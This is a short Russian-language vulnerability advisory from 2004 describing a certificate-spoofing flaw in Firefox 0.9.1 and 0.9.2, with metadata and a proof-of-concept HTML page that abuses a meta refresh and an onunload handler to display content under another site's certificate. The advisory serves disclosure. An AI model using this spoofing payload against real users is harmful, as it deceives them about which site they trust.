Security Lab

Уязвимость подделки сертификатов в Mozilla Firefox

Дата публикации:27.07.2004
Всего просмотров:1925
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Firefox 0.9.1, 0.9.2

Описание: Уязвимость подделки сертификатов обнаружена в Mozilla Firefox. Удаленный Web сервер может подделать сертификат другого сайта.

Удаленный пользователь может создать специально обработанный HTML, который отобразит Web страницу с сертификатом другого произвольного безопасного Web сайта. Пример:

< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY 
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');

document.close();
window.location.reload();
">
< /body>

URL производителя: http://www.mozilla.org/products/firefox/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Mozilla Firefox Certificate Spoofing